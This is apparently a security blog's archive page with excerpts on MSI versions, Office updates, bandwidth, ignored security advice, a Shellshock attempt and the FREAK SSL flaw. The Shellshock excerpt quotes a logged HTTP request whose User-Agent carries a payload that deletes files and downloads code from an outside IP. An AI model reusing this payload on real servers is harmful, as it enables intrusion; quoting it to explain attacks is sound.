General

How to get the version of an MSI package in Linux

Ever tried to get the version of an MSI package on Linux ? Exiftool doesn’t do that, unfortunately. I requested it in the forum, let’s see if somebody jumps on it. 🙂 Until then, try to use the system utility “file” and do some parsing on the bold red text. #file google.msi: Composite Document File […]

General

Microsoft, you’re not as smart as you thing you are!

I was installing an update of OneNote and I suddenly received this popup:   Continuing could be expensive” You’re connected to a network that limits downloads every month. We need to stream some large files over your network connection to install Ofifice, so we recommend installing while connected to an unrestricted netowork. … Seriourly, Microsoft? […]

General

Do you know what makes the Internet so slow?

According to some online sources, PORN is what uses around 30% of the Internet’s bandwidth. Why do I care about this?   Because the top searches in my news portal IT Security News (www.itsecuritynews.info) are: nude videos, porn and naked pictures of celebrities. I guess we are living in a very … lonely world.   This is also how […]

General News

Why security recommendations often get ignored

I read very often about vulnerabilities and companies that got hacked. Many times, the reason for which they got hacked was because some recommendation issued by some smart people (read: security minded people) are ignored.   But why are they ignored? I found some articles where several explanations are given for what is called “information avoidance“. […]

General

How a Shellshock exploit attempt looks like

One of my HTTP servers hosted on an Amazon EC2 receives regularly strange requests like these:   One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; […]

General News

FREAK: All Windows versions are affected too

UPDATE on the FREAK vulnerability in SSL: it affects not only Android and iOS but all Windows versions too.   I wrote about the new SSL vulnerability called FREAK – Factoring RSA Export Keys – affects around 36% of all sites trusted by browsers and around 10% of the Alexa top one million domains, according to […]